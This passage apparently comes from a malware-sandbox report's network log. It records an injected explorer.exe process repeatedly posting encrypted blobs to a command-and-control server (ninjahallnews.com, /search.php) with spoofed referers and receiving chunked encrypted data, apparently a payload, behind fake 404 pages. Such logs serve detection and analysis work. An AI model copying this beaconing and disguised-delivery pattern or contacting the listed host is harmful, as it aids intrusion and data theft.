                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.44997223.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:57 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://vhdgrtytskult.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 243
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:57 UTC243OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 74 a2 74 97 82 fb 2a 58 e5 0f 13 f5 5f ca ea 18 3e b2 35 3b 78 8d a9 fe 6e c4 af 70 57 c5 9b 48 ef 6f 2a 83 d9 1d 22 20 5c 2f 53 ec 7a ad e5 b7 4c f1 af 30 33 2f 98 42 37 dd 7d 59 8d 8c 98 cc 0d 2c b8 00 ab 66 8e 03 31 a3 2b ba 5d 52 51 39 5c c8 de 0a 89 9d 0a ee 02 7e c0 a9 a4 31 fc ba 05 a9 b2 e6 b2 58 33 b9 93 c3 69 0c ab 41 2c d2 66 76 28 e1 4e 71 79 ba 40 10 03 de 9b 86 62 2c cf d5 23 8a 58 cb ac c7 72 73 63 58 cc 5b 6e 04 19 3a cd 58 b1 b4 2b 31 6d 51 1f 8b b1 7a 5d 00 11 95 e9 e3 74
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lf4%<tt*X_>5;xnpWHo*" \/SzL03/B7}Y,f1+]RQ9\~1X3iA,fv(Nqy@b,#XrscX[n:X+1mQz]t
                                                                                                      2024-10-07 22:20:57 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:57 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.44997823.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:57 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://ujxngjrjlobur.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 240
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:57 UTC240OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 3d cf 0c ef dc ea 0d 4c ca 12 09 8e 62 f2 ce 11 66 bd 26 4b 56 c6 f6 da 56 ff d2 7f 75 8a 94 72 e2 43 3d f3 cf 17 7e 5e 5f 1f 07 e2 77 d4 95 a5 3c 84 f0 61 68 1c 97 70 28 e3 67 01 c5 f4 fb c8 3a 03 c7 12 a8 2a f6 3b 2b b6 06 a3 20 57 62 18 5e bb e6 64 b2 ba 6e d2 27 1b e0 e5 ca 00 b0 ef 40 9a 9c bc c2 52 75 af bb d2 47 07 bd 4b 46 c2 6c 0e 19 b7 69 24 38 c7 35 65 5f 99 97 f8 61 6d a2 f1 02 ee 74 81 f0 d9 0e 6f 32 5d a2 12 32 49 35 60 d5 27 92 9c 72 2b 1b 3d 3d 85 bd 45 2f 3b 53 ff
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lg4%<=Lbf&KVVurC=~^_w<ahp(g:*;+ Wb^dn'@RuGKFli$85e_amto2]2I5`'r+==E/;S
                                                                                                      2024-10-07 22:20:58 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:58 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.44998423.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:58 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://igxvqkyyvgmutmd.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 289
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:58 UTC289OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 29 e8 39 84 a4 c3 1f 2d fd 29 1b ed 35 cf 8f 08 6f c7 09 10 5a bc e0 f2 3d df ed 5e 1e d3 f6 70 e0 38 3f a3 92 45 08 59 4d 5c 5e fb 06 b8 c9 b2 48 e0 93 5c 2c 0d a7 6d 54 ec 34 40 c4 9d fc b6 53 31 a0 7f c6 69 f1 14 37 d6 0c 93 67 59 44 74 7f bf e3 07 96 c4 1a c0 19 10 9d ac cb 59 b9 93 74 e4 c6 98 96 57 6f d9 ad ad 48 46 d8 51 10 89 01 58 55 bf 59 10 69 ad 3a 2e 5f d6 d7 ef 7b 51 b0 e4 77 e8 75 da b7 d8 0a 1f 24 2a c7 14 27 66 4e 6d d7 0c f7 ba 1c 09 65 5f 18 ee 94 7d 47 2d 34 91 eb de 31 97 b7 76 85 32 89 fd b7 bb 15 9b 31
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Ld4%<)9-)5oZ=^p8?EYM\^H\,mT4@S1i7gYDtYtWoHFQXUYi:._{Qwu$*'fNme_}G-41v21
                                                                                                      2024-10-07 22:20:59 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:58 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.44999423.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:59 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://pkuvdwenklvosy.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 154
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:59 UTC154OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 65 34 01 83 b7 25 93 3c 7c f6 03 88 a0 a7 57 05 a8 04 1e ef 7b d2 f5 06 3a b6 7d 17 2c 83 a9 f0 6b b2 b8 4d 6c 81 f6 6b 97 21 55 bb e4 0f 00 50 14 02 2a f4 0a cf fa ac 05 fc 83 70 27 58 94 07 36 c6 35 06 c5 c7 fc b0 38 61 c9 71 ea 24 ab 09 3c b5 10 e9
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Le4%<|W{:},kMlk!UP*p'X658aq$<
                                                                                                      2024-10-07 22:21:00 UTC294INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:21:00 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      2024-10-07 22:21:00 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 5b 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                                      Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU[44A:F=
                                                                                                      2024-10-07 22:21:00 UTC19INData Raw: 1a 58 b3 14 d0 ff ef 1b ab d5 44 9d a9 19 24 1b 3c de a6
                                                                                                      Data Ascii: XD$<
                                                                                                      2024-10-07 22:21:00 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:21:00 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                                                      Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                                                      2024-10-07 22:21:00 UTC6INData Raw: 4e 13 8c ae b0 c7
                                                                                                      Data Ascii: N
                                                                                                      2024-10-07 22:21:00 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:21:00 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b0 80 d9 81 f6 4b 57 1e 8f 04 5f c4 c0 88 47 ee 18 f5 d8 ff a1 a2 c6 ae 36 1a 9d e0 fb 7a 50 95 22 b5 51 4d 25 b1 f4 18 0c 15 d1 06 0a 15 7b 23 d8 b9 63 41 09 53 8b 61 24 04 92 dd b9 c9 34 db 29 b1 d3 b5 7d 9b b6 ff 21 7f 68 a3 a1 98 ca f2 df ce 52 bb f4 67 4b 05 db df 01 f6 41 65 c4 8c 63 3c 95 b8 4a 79 8f 0e fc ec 98 91 1c 6c 75 27 c8 43 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 67 b6 ef 85 11 52 c9 bf 4e b0 d6 66 9d d8 30 3f 8d 93 5a f5 d5 f3 5f 31 3d a5 2e 45 85 49 21 aa 61 86 37 f7 f5 9a 70 4c 4d f9 1c fb e1 fe d1 ee cb fa 02 71 1e 89 dd 8a 35
                                                                                                      Data Ascii: 20007KW_G6zP"QM%{#cASa$4)}!hRgKAec<Jylu'CUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vgRNf0?Z_1=.EI!a7pLMq5
                                                                                                      2024-10-07 22:21:00 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                                                      Data Ascii: G-Q
                                                                                                      2024-10-07 22:21:00 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.45000123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:21:01 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://mmqmkrfdtvmaos.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 248
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:21:01 UTC248OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 65 34 01 83 b6 25 93 3c 43 b6 62 e9 ce b0 35 30 df 22 65 81 2a d7 83 19 07 f6 32 3a 3c ad d4 88 41 f1 a6 1a 0b ed 8e 74 ac 58 21 93 c3 71 21 79 7d 41 37 f6 38 cd 9f 81 28 ef b6 43 11 3e 99 0a 59 f3 71 51 cc fa e1 c0 2d 2c a8 14 d1 71 f2 30 5c 9b 23 9f 37 32 77 27 5c c6 f6 62 e3 c2 36 91 0f 20 f2 d1 d9 13 b9 f5 47 a0 83 88 aa 09 5f aa d9 a0 03 23 ba 19 0e 89 74 17 24 82 6b 16 43 b2 5a 71 50 8b d2 f9 2a 7f 92 a9 38 e2 4b f1 be f8 60 06 3a 4b de 71 22 1f 09 79 de 4b 8b cd 30 5a 33 4a 16 f1 e1 5c 53 3f 01 b0 e8 f2 4d e9 ba 11 c2 14
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[ALe4%<Cb50"e*2:<AtX!q!y}A78(C>YqQ-,q0\#72w'\b6 G_#t$kCZqP*8K`:Kq"yK0Z3J\S?M
                                                                                                      2024-10-07 22:21:01 UTC287INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:21:01 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 409
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      2024-10-07 22:21:01 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.45000723.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:21:02 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://klmaxatwhce.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 268
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:21:02 UTC268OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7a 34 01 83 b7 25 93 3c 51 c8 0f 9c 82 a3 13 06 be 06 6a ed 27 9a ce 30 6b cf 19 0a 24 80 b5 ec 74 cb c7 64 12 ec e8 2a b7 21 67 f9 e2 6a 21 20 1c 32 36 cc 6e d3 e9 80 0d de 8c 63 08 38 e1 6e 02 aa 35 68 99 cb a0 97 30 1b a9 68 c3 7d 89 01 4f a5 1c 93 63 5a 31 04 79 fb d9 0a a1 8d 1d 91 2d 2d c8 b3 bf 2e ed e4 7f eb ae 87 ce 34 32 a5 bf a5 41 39 95 54 08 de 71 44 19 e4 51 1d 79 b2 38 12 09 c6 cd f4 1b 60 be d9 02 eb 2c cd a7 f1 7a 0f 63 30 a6 18 0f 15 38 15 ba 5e ee 81 38 41 11 66 4b e2 e4 7e 36 14 3b 94 c8 c0 55 95 f2 19 cf 77 c5 82 aa 99 60 94 45
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lz4%<Qj'0k$td*!gj! 26nc8n5h0h}OcZ1y--.42A9TqDQy8`,zc08^8AfK~6;Uw`E
                                                                                                      2024-10-07 22:21:02 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:21:02 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.45001323.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:21:03 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://kouspbvvekjqvnkd.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 239
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:21:03 UTC239OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7b 34 01 83 b7 25 93 3c 47 c3 74 e1 8f fb 0b 38 c1 77 00 b9 52 8d e4 3b 72 b6 67 2e 41 b9 e0 da 7d b6 e7 58 08 f7 94 71 ad 2f 6e b3 fb 4a 3c 2e 03 09 1c c4 65 bb d6 81 1e db b7 53 7f 02 84 64 44 d3 4c 60 fa d0 f0 a4 23 26 a5 67 de 6d e1 07 58 9a 56 c7 2e 31 24 64 66 d6 c1 40 a9 98 6c d7 3b 3b 96 cc ba 08 c2 f6 0d 82 d4 93 a3 1d 6b ad cc ab 1d 05 a1 5d 50 d7 62 0f 13 f0 6e 25 44 f6 1e 76 50 e2 cc c5 7e 30 be cb 7b 9a 6d d3 c4 a2 2b 3a 24 53 ca 10 02 1f 2a 12 e6 15 e2 9f 67 0c 6d 79 0e dc b9 4e 3f 2f 67
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@L{4%<Gt8wR;rg.A}Xq/nJ<.eSdDL`#&gmXV.1$df@l;;k]Pbn%DvP~0{m+:$S*gmyN?/g
                                                                                                      2024-10-07 22:21:03 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:21:03 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.45005023.145.40.1684432140C:\Windows\SysWOW64\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:21:11 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://ninjahallnews.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 4431
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:21:11 UTC4431OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad cb 1f e6 21 7a ed df ad 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f
                                                                                                      Data Ascii: r{O)fz<pqBnluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu|!z:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
                                                                                                      2024-10-07 22:21:11 UTC287INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:21:11 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 409
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      2024-10-07 22:21:11 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.45006323.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:22:27 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://giugthslvfwuci.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 109
                                                                                                      Host: ninjahallnews.com
